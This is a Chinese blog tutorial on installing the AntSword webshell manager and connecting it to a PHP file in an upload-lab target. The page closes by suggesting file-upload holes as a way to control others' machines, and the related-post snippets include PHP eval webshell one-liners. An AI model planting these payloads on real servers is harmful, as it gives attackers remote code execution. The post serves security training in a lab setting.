shell管理--中国蚁剑,牛刀小试

最新推荐文章于 2024-08-04 20:22:54 发布
最新推荐文章于 2024-08-04 20:22:54 发布
阅读量2.4k 收藏 1
点赞数 4
文章标签: 测试工具 github
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62636343/article/details/124652718
版权
本文详细介绍了蚁剑(AntSword)的安装步骤,包括从GitHub下载、初始化设置及启动。通过实例展示了如何在靶场中测试蚁剑的功能,如上传PHP文件并进行网站管理。此外,还探讨了在实战中利用文件上传漏洞进行远程控制的可能性。
摘要由CSDN通过智能技术生成

1--安装地址

github地址:https://github.com/AntSwordProject

蚁剑加速器:GitHub - AntSwordProject/AntSword-Loader: AntSword 加载器

2--安装教程

两个全部解压好(一个是源码,一个是启动文件/加载器)

 先打开 AntSword-Loader-x64(加载器)文件夹里面的 AntSword.exe

点击初始化(选择蚁剑工作目录)

 

 点击初始化并选择 antSword-2.1.9 文件夹

然后重启软件就好啦!

3--使用(在upload靶场中测试)

          a.在文件目录中插入php文件

 

 test.php内容为

          b.保存后登录查看

          c.打开蚁剑-右击添加数据

 输入URL,密码

 之后点击 测试连接,检查是否能成功。

 成功后点击“添加”,即完成了一次网站管理。

 之后可进行一系列操作。

在实战中,我的看法是可以通过文件上传漏洞或者网页挂马等方式在对放计算机中放置木马,从而进行对对方电脑的操控。

谢谢观看。

中北网安小生
关注
  • 4
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
1-1:学习shellshell是什么
快乐江湖的博客
03-04 535
文章目录前言:什么是shell一:终端仿真器 前言:什么是shell 首先需要明确的一点是,我们经常口中提到的命令行,其实指的就是shell,那么shell是什么呢,这就不得不用下面这么一张图了 注意,关于这个问题其实我在下面的这篇文章中说的已经很清楚了,如果需要理解请移步:操作系统原理 大家可以看到shell处于用于操作接口,所以 shell是一个把键盘输入的命令传递给操作系统的程序 大家使用的可能是各种各样的Linux发行版,但是无一例外的都会提供这样一个shell程序,这个程序来自于称之为bas
.rar 网络安全工具 shell工具
03-20
shell
哥斯拉-webshell管理工具
热门推荐
nex1less的博客
08-21 1万+
0x01 工具由来 **期间,各大厂商的waf不断,在静态查杀、流量通信等方面对webshell进行拦截,众红队急需一款优秀的权限管理工具,冰蝎3.0的发布可能缓解了流量加密的困境,但是冰蝎3.0的bug众多,很多朋友甚至连不上冰蝎的shell,于是@BeichenDream决定公开他所开发的一款shell权限管理工具,名为“哥斯拉”。 0x02 工具介绍和使用 请点这 0x03 工具下载 请点这 如何加速下载github上的文件? 请点这(需要能访问谷歌商店) 0...
中国蚁剑+burpsuite+webshell文件上传(超完整)
qq_50953689的博客
05-14 2789
之前:需要打开phpstudy的靶场环境 第一步 ➊准备木马文件 新建木马文件ttx.php,文件内容为 <?php @eval($_REQUEST["shell"]); ?> ➋保存后,将文件后缀名php改为jpg ➌登录dvwa测试环境,将security等级改为‘low’(其它模式,后端也做了校验,无法完成第⑤步的操作),然后打开文件上传模块 ➍上传文件,选择第②步保存的shell.jpg,在点击‘Upload’之前,打开burpsuite拦截功能并且点击‘Upl
中国蚁剑:webshell管理工具
这里是Y.lin的博客,你好,很高兴云里相遇!希望能给你提供一点帮助
04-28 739
中国蚁剑是一款开源的跨平台网站管理工具,它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员,比菜刀功能更加丰富的webshell管理工具
中国蚁剑运用
weixin_43622525的博客
01-13 610
访问之前创建的dvwa靶场 更改安全等级为low并且提交 写一句话马 <?php @eval($_POST['cmd']); ?> 生成文件名为shell.php 上传此文件 显示成功 获得上传路径 打开中国蚁剑 右键空白处选择添加数据 URL地址为之前获得的路径地址 连接密码输入写的shell.php中内容cmd 点击虚拟终端 获得权限 ...
【2023年】云计算金砖牛刀小试2
最新发布
geekgold的博客
08-04 1987
2023年一带一路职业技能大赛之云计算赛项,欢迎交流学习VX: wenjinworkon
cmd操作MongoDB数据库牛刀小试.pptx
06-20
MongoDB是一种流行的 Nosql(非关系型)数据库系统,它以JSON格式的文档作为存储单元,提供了高效、灵活的数据管理方案。与传统的关系型数据库不同,MongoDB不需要预先定义模式,这使得它在处理结构不固定或快速变化...
【2023年】云计算金砖牛刀小试
geekgold的博客
08-03 763
2023年山东金砖挑战赛
内网渗透之小试牛刀
SoulCat
03-02 1952
sqlsever手把手注入 所谓,一见钟情不过见色起意,日久生情不过权衡利弊。人生来就是孤单的。 文章目录sqlsever手把手注入判断:MSSQL注入:多种注入:绕waf: 判断: 首先判断数据库 Access: and (select count (*) from MSysAccessObjects) >0 MSSQL: and (select count (*) from ...
getshell神器-,包含Linux windows双系统
08-10
内涵linux,windows双版本安装,最新最全的安装包,强推建议收藏!!!!!
攻防世界web、web shell关卡使用中国蚁剑
Lu__xiao的博客
11-30 926
访问web shell关卡进入此网站,得到下面一句话 打开,右击空白,添加数据 URL 填写网站地址 密码shell 点击添加 连接后在网站目录下可以看到 flag.txt文件 里面放置flag index.php文件 里面放置网站源代码 源代码 flag:cyberpeace{7d9b52e47e2e775606e7c143f55b398c} webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种...
Web安全-AntSword(中国蚁剑)Webshell管理工具使用
Boom!脑洞大爆炸的博客
07-03 5704
Web安全-AntSword(中国蚁剑)Webshell管理工具使用
攻防兼备:中国蚁剑使用指南及特征流量
ZL_1618的博客
03-06 4061
这款工具在流量加密上特征比较明显,而且返回包多是明文,很容易在流量上就被查杀。!!接下来我将给各位同学划分一张学习计划表!
中国蚁剑AntSword实战
大河之犬的博客
03-26 1923
有时候在连接特定 Shell 时,需要使用定制的 HTTP 请求头,常见的如Cookie、User-Agent 等,或者是需要在 POST 数据中添加特定的字段,此时需要使用「请求信息配置」点击「初始化」按钮,选择的源代码目录,或者选择一个空目录作为的工作目录,加载器会自动下载源代码。进入主程序后,在「数据 管理」区选择你要进行管理Shell,单击鼠标右键,在弹出菜单中选择「数据库管理」先在目标上传一个webshell,打开,在空白位置单击「鼠标右键」,弹出菜单,选择 「添加数据」
【网络安全】AntSword()入门+实战
等风来
04-27 4432
(AntSword)是一款开源的跨平台WebShell管理工具,它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员。中国蚁剑的特点主要有如下几点:1.支持多平台。包括macOS、Linux 32位、Linux 64位、Linux armv7l、Linux arm64、Windows 32位、Windows 64位。2.完善的文档。中国蚁剑文档地址。3.多项功能。文件管理功能、虚拟终端功能、数据库管理功能。4.内置代理功能。
Linux通过反弹Shell提权实验
qq_59201520的博客
02-20 1484
通过反弹shell在Linux上提权的实验
中国蚁剑安装和使用教程(GOOD)
weixin_74245209的博客
11-30 2105
可以看到这是最高权限system相当于Linux中的root。官方加载器:(加载器分为Mac、Windows、Linux)在运行AntSword .exe。里面有一些好用的插件,大家自己去看。的大名想必各位都听过今天来安装配置。可以上传,修改或删除。可以右键建个快捷方式。添加webshell地址和密码。2.添加webshell。第一个箭头单点进入终端。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值